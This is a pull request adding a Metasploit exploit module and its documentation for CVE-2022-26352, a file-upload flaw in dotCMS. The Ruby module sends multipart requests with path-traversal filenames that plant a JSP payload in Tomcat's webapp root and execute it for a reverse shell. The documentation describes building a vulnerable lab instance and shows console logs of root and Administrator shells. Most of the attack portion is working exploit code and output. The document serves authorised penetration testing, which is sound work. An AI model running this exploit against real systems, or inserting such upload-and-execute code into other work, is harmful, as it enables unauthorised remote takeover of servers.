### PR TITLE
DotCMS File Upload to RCE Module (CVE-2022-26352)

### DIFF
--- a/documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md
@@ -5,7 +5,7 @@ return a reverse shell.
 ## Vulnerable Application
 
 ### Clone and build a vulnerable version of dotCMS:
-This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions) 
+This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
 1. `git clone https://github.com/dotCMS/core.git`
 1. `cd core`
 1. `git checkout 7d604e5 (this is vulnerable version 21.06)`

--- a/documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md
@@ -1,0 +1,186 @@
+## Description
+This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each 
+respective stream. The module uploads a jsp payload to the tomcat ROOT directory. It then executes the payload to 
+return a reverse shell.
+## Vulnerable Application
+
+### Clone and build a vulnerable version of dotCMS:
+This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions) 
+1. `git clone https://github.com/dotCMS/core.git`
+1. `cd core`
+1. `git checkout 7d604e5 (this is vulnerable version 21.06)`
+1. `cd dotCMS/`
+1. `./gradlew createDist`
+```
+Starting a Gradle Daemon (subsequent builds will be faster)
+
+<output truncated>
+
+BUILD SUCCESSFUL in 12m 53s
+21 actionable tasks: 19 executed, 2 up-to-date
+```
+
+If the build was successful you should now have a vulnerable 21.06 linux and windows instance:
+```
+msfuser@ubuntu:~/core/dotCMS$ ls -l ../dist-output/
+total 811132
+-rw-rw-r-- 1 msfuser msfuser 413134562 May 20 10:22 dotcms_21.06.tar.gz
+-rw-rw-r-- 1 msfuser msfuser 417462181 May 20 10:24 dotcms_21.06.zip
+```
+
+Inside each of the above compressed directories exists a directory `dotserver` which contains the vulnerable app.
+
+### Ubuntu 20.04 install
+
+#### Install JAVA 1.8 
+
+1. `export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"`
+1. `export PATH=$JAVA_HOME/bin:$PATH`
+1. `sudo apt-get install openjdk-8-jre`
+
+#### Install Postgres 
+
+1. `sudo apt install postgresql -y`
+1. `sudo -u postgres psql`
+1. Change the default database, username and password from `dotcms` to `postgres` (or create the db and user `dotcms`).
+1. `vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/db.properties`
+```
+##Postgres default configuration
+driverClassName=org.postgresql.Driver
+jdbcUrl=jdbc:postgresql://localhost/postgres
+username=postgres
+password=postgres
+```
+
+#### Install Elastic Search
+
+1. `sudo apt install apt-transport-https ca-certificates wget`
+1. `wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -`
+1. `sudo sh -c 'echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" > /etc/apt/sources.list.d/elastic-7.x.list'`
+1. `sudo apt update`
+1. `sudo apt install elasticsearch`
+1. `sudo systemctl daemon-reload `
+1. `sudo systemctl enable elasticsearch.service`
+1. `sudo systemctl start elasticsearch.service`
+1. `sudo systemctl status elasticsearch.service`
+1. Edit `dotcms-config-cluster.properties` to ensure the following properties are set:
+1. `vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/dotcms-config-cluster.properties`
+```
+ES_ENDPOINTS=http://localhost:9200
+
+ES_PROTOCOL=http
+ES_HOSTNAME=localhost
+ES_PORT=9200
+
+ES_TLS_ENABLED=false
+```
+
+#### Run dotCMS 
+
+1. `cd dotserver/tomcat-9.0.41/bin/`
+1. `chmod 755 *.sh`
+1. `catalina.sh run`
+1. Test the server is up with: `curl -vk localhost:8080/dotAdmin/`
+
+### Windows 10 install
+
+#### Install Java 1.8
+
+1. Download and follow wizard to install:
+    https://www.oracle.com/java/technologies/downloads/#license-lightbox
+
+#### Install Elasticsearch 8.2.0
+
+Download and follow wizard to install:
+https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.2.0-windows-x86_64.zip dotcms-config-cluster.properties
+1. Ensure dotcms-config-cluster.properties contains the same properties as specified above
+
+#### Install Postgres 10.21
+
+1. Download and follow wizard to install:
+    https://www.enterprisedb.com/postgresql-tutorial-resources-training?uuid=ea5c8104-3940-4ed1-b427-81cf19781581&campaignId=70138000000rYFmAAM
+1. Ensure db.properties contains the same properties as specified above
+
+#### Run dotCMS
+
+1. `cd dotserver\tomcat-9.0.41\bin\`
+1. `catalina.bat run`
+1. Test the server is up with: `curl -vk localhost:8080/dotAdmin/`
+
+## Verification Steps
+1. `use multi/http/dotcms_file_upload_rce`
+2. `set RHOSTS [ips]`
+3. `set LHOST [ips]`
+4. `run`
+
+## Scenarios
+
+### Ubuntu 20.04 dotCMS 21.06:
+```
+msf6 > use exploit/multi/http/dotcms_file_upload_rce
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
+rhosts => 172.16.199.227
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/dotcms_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[+] Successfully executed JSP payload
+[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
+[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Windows 10 dotCMS 21.06:
+```
+msf6 > use dotcms_file_upload_rce
+[*] Using exploit/multi/http/dotcms_file_upload_rce
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.231
+rhosts => 172.16.199.231
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/dotcms_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[+] Successfully executed JSP payload
+[!] Tried to delete ../webapps/ROOT/AkqMhxCZWr.jsp, unknown result
+[!] Tried to delete ../webapps/ROOT/xdPfn9JTdu33X.jsp, unknown result
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.231:50016) at 2022-05-20 12:41:36 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19042.1706]
+(c) Microsoft Corporation. All rights reserved.
+-----
+
+
+C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>whoami
+whoami
+desktop-h1lncdm\administrator
+
+C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>systeminfo
+systeminfo
+
+Host Name:                 DESKTOP-H1LNCDM
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+
+<output truncated>
+```
+Note on windows the module reports an unknown result when trying to delete the files though it does successfully 

--- a/documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/dotcms_file_upload_rce.md
@@ -1,8 +1,8 @@
-## Description
-This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each 
-respective stream. The module uploads a jsp payload to the tomcat ROOT directory. It then executes the payload to 
-return a reverse shell.
 ## Vulnerable Application
+
+### Description
+This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each
+respective stream. The module uploads a jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
 
 ### Clone and build a vulnerable version of dotCMS:
 This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
@@ -32,13 +32,13 @@ Inside each of the above compressed directories exists a directory `dotserver` w
 
 ### Ubuntu 20.04 install
 
-#### Install JAVA 1.8 
+#### Install JAVA 1.8
 
 1. `export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"`
 1. `export PATH=$JAVA_HOME/bin:$PATH`
-1. `sudo apt-get install openjdk-8-jre`
+1. `sudo apt-get install openjdk-8-jdk`
 
-#### Install Postgres 
+#### Install Postgres
 
 1. `sudo apt install postgresql -y`
 1. `sudo -u postgres psql`
@@ -75,7 +75,7 @@ ES_PORT=9200
 ES_TLS_ENABLED=false
 ```
 
-#### Run dotCMS 
+#### Run dotCMS
 
 1. `cd dotserver/tomcat-9.0.41/bin/`
 1. `chmod 755 *.sh`
@@ -183,4 +183,4 @@ OS Version:                10.0.19042 N/A Build 19042
 
 <output truncated>
 ```
-Note on windows the module reports an unknown result when trying to delete the files though it does successfully 
+Note on windows the module reports an unknown result when trying to delete the files though it does successfully

--- a/modules/exploits/multi/http/dotcms_file_upload_rce.rb
+++ b/modules/exploits/multi/http/dotcms_file_upload_rce.rb
@@ -1,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => ' Multipart File Directory Traversal can lead to Remote Code Execution',
+        'Description' => %q{
+          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
+          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename
+          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a
+          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get
+          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special
+          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
+        },
+        'Author' => [
+          'Shubham Shah',  # Discovery and analysis
+          'Hussein Daher', # Discovery and analysis
+          'jheysel-r7'    # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-26352'],
+          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']
+        ],
+        'Privileged' => false,
+        'Platform' => %w[linux win],
+        'Targets' => [
+          [
+            'Automatic',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Java Windows',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'Java Linux',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-05-03',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+                       Opt::RPORT(8443),
+                       OptString.new('TARGETURI', [true, 'Base path', '/'])
+                     ])
+  end
+
+  # def check
+  #   testurl = Rex::Text.rand_text_alpha(10)
+  #   testcontent = Rex::Text.rand_text_alpha(10)
+  #
+  #   send_request_cgi({
+  #     'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
+  #     'method' => 'PUT',
+  #     'data' => "<% out.println(\"#{testcontent}\");%>"
+  #   })
+  #
+  #   res1 = send_request_cgi({
+  #     'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"),
+  #     'method' => 'GET'
+  #   })
+  #
+  #   if res1 && res1.body.include?(testcontent)
+  #     send_request_cgi(
+  #       'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
+  #       'method' => 'DELETE'
+  #     )
+  #     return Exploit::CheckCode::Vulnerable
+  #   end
+  #   Exploit::CheckCode::Safe
+  # end
+
+
+
+  def write_jsp_payload
+    jsp_path = "../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/#{jsp_filename}"
+
+    print_status('Writing JSP payload')
+    vprint_status(jsp_path)
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(
+      payload.encoded,
+      'text/plain', # Content-Type
+      nil, # Content-Transfer-Encoding
+      "form-data; name=\"name\"; filename=\"#{jsp_path}\""
+    )
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/content/'),
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    )
+
+
+    unless res&.code == 500
+      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
+    end
+
+    register_file_for_cleanup(jsp_path)
+
+    print_good('Successfully wrote JSP payload')
+  end
+
+  def execute_jsp_payload
+    jsp_uri = normalize_uri(target_uri.path, jsp_filename)
+
+    print_status('Executing JSP payload')
+    vprint_status(full_uri(jsp_uri))
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => jsp_uri,
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
+    end
+
+    print_good('Successfully executed JSP payload')
+  end
+
+  def exploit
+    write_jsp_payload
+    execute_jsp_payload
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
+  end
+
+end

--- a/modules/exploits/multi/http/dotcms_file_upload_rce.rb
+++ b/modules/exploits/multi/http/dotcms_file_upload_rce.rb
@@ -9,12 +9,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => ' Multipart File Directory Traversal can lead to Remote Code Execution',
+        'Name' => 'Multipart File Directory Traversal can lead to Remote Code Execution.',
         'Description' => %q{
           When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
           file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename
@@ -26,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'Shubham Shah',  # Discovery and analysis
           'Hussein Daher', # Discovery and analysis
-          'jheysel-r7'    # Metasploit module
+          'jheysel-r7'     # Metasploit module
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -73,44 +74,44 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-                       Opt::RPORT(8443),
-                       OptString.new('TARGETURI', [true, 'Base path', '/'])
-                     ])
+      Opt::RPORT(8443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
   end
 
-  # def check
-  #   testurl = Rex::Text.rand_text_alpha(10)
-  #   testcontent = Rex::Text.rand_text_alpha(10)
-  #
-  #   send_request_cgi({
-  #     'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
-  #     'method' => 'PUT',
-  #     'data' => "<% out.println(\"#{testcontent}\");%>"
-  #   })
-  #
-  #   res1 = send_request_cgi({
-  #     'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"),
-  #     'method' => 'GET'
-  #   })
-  #
-  #   if res1 && res1.body.include?(testcontent)
-  #     send_request_cgi(
-  #       'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
-  #       'method' => 'DELETE'
-  #     )
-  #     return Exploit::CheckCode::Vulnerable
-  #   end
-  #   Exploit::CheckCode::Safe
-  # end
+  def check
+    test_content = Rex::Text.rand_text_alpha(10)
+    test_file = "#{test_content}.jsp"
+    test_path = "../../#{test_file}"
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(
+      test_content,
+      'text/plain', # Content-Type
+      nil, # Content-Transfer-Encoding
+      "form-data; name=\"name\"; filename=\"#{test_path}\""
+    )
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/content/'),
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    )
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, test_file.to_s)
+    )
 
-
+    if res && res.body.include?(test_content)
+      register_file_for_cleanup("../webapps/ROOT/#{test_file}")
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
 
   def write_jsp_payload
-    jsp_path = "../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/#{jsp_filename}"
-
+    jsp_path = "../../#{jsp_filename}"
     print_status('Writing JSP payload')
     vprint_status(jsp_path)
-
     multipart_form = Rex::MIME::Message.new
     multipart_form.add_part(
       payload.encoded,
@@ -126,31 +127,26 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => multipart_form.to_s
     )
 
-
     unless res&.code == 500
       fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
     end
 
-    register_file_for_cleanup(jsp_path)
-
+    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
     print_good('Successfully wrote JSP payload')
   end
 
   def execute_jsp_payload
     jsp_uri = normalize_uri(target_uri.path, jsp_filename)
-
     print_status('Executing JSP payload')
     vprint_status(full_uri(jsp_uri))
-
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => jsp_uri,
+      'uri' => jsp_uri
     )
 
     unless res&.code == 200
       fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
     end
-
     print_good('Successfully executed JSP payload')
   end
 
@@ -162,5 +158,4 @@ class MetasploitModule < Msf::Exploit::Remote
   def jsp_filename
     @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
   end
-
 end

--- a/modules/exploits/multi/http/dotcms_file_upload_rce.rb
+++ b/modules/exploits/multi/http/dotcms_file_upload_rce.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Multipart File Directory Traversal can lead to Remote Code Execution.',
+        'Name' => 'DotCMS RCE via Arbitrary File Upload.',
         'Description' => %q{
           When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
           file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => %w[linux win],
         'Targets' => [
           [
-            'Automatic',
+            'Java Linux',
             {
               'Arch' => ARCH_JAVA,
               'Platform' => 'linux'
@@ -49,13 +49,6 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch' => ARCH_JAVA,
               'Platform' => 'win'
-            }
-          ],
-          [
-            'Java Linux',
-            {
-              'Arch' => ARCH_JAVA,
-              'Platform' => 'linux'
             }
           ]
         ],
@@ -83,48 +76,62 @@ class MetasploitModule < Msf::Exploit::Remote
     test_content = Rex::Text.rand_text_alpha(10)
     test_file = "#{test_content}.jsp"
     test_path = "../../#{test_file}"
-    multipart_form = Rex::MIME::Message.new
-    multipart_form.add_part(
-      test_content,
-      'text/plain', # Content-Type
-      nil, # Content-Transfer-Encoding
-      "form-data; name=\"name\"; filename=\"#{test_path}\""
-    )
+    uuid = Faker::Internet.uuid
+
+    jsp = <<~EOS
+      <%@ page import=\"java.io.File\" %>
+      <%
+        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");
+        jsp.delete();
+      %>
+      #{uuid}
+    EOS
+
+    vars_form_data = [
+      {
+        'name' => 'name',
+        'data' => jsp,
+        'encoding' => nil,
+        'filename' => test_path,
+        'mime_type' => 'text/plain'
+      }
+    ]
+
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/content/'),
-      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
-      'data' => multipart_form.to_s
+      'vars_form_data' => vars_form_data
     )
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, test_file.to_s)
     )
 
-    if res && res.body.include?(test_content)
-      register_file_for_cleanup("../webapps/ROOT/#{test_file}")
+    if res && res.body.include?(uuid)
       return Exploit::CheckCode::Vulnerable
     end
+
     Exploit::CheckCode::Safe
   end
 
   def write_jsp_payload
     jsp_path = "../../#{jsp_filename}"
     print_status('Writing JSP payload')
-    vprint_status(jsp_path)
-    multipart_form = Rex::MIME::Message.new
-    multipart_form.add_part(
-      payload.encoded,
-      'text/plain', # Content-Type
-      nil, # Content-Transfer-Encoding
-      "form-data; name=\"name\"; filename=\"#{jsp_path}\""
-    )
+    vars_form_data = [
+      {
+        'name' => 'name',
+        'data' => payload.encoded,
+        'encoding' => nil,
+        'filename' => jsp_path,
+        'mime_type' => 'text/plain'
+      }
+    ]
 
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/content/'),
-      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
-      'data' => multipart_form.to_s
+      'vars_form_data' => vars_form_data
     )
 
     unless res&.code == 500
@@ -138,7 +145,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_jsp_payload
     jsp_uri = normalize_uri(target_uri.path, jsp_filename)
     print_status('Executing JSP payload')
-    vprint_status(full_uri(jsp_uri))
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => jsp_uri

--- a/modules/exploits/multi/http/dotcms_file_upload_rce.rb
+++ b/modules/exploits/multi/http/dotcms_file_upload_rce.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     jsp = <<~EOS
       <%@ page import=\"java.io.File\" %>
       <%
-        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{@jsp_file}");
+        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");
         jsp.delete();
       %>
       #{uuid}


### PR DESCRIPTION
https://github.com/rapid7/metasploit-framework/issues/16522

This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each respective stream. The module uploads a jsp payload to the tomcat ROOT directory. It then executes the payload to return a reverse shell.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] use multi/http/dotcms_file_upload_rce
- [ ] set RHOSTS [ips]
- [ ] set LHOST [ips]
- [ ] run

## Demo
```
msf6 > use exploit/multi/http/dotcms_file_upload_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
rhosts => 172.16.199.227
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```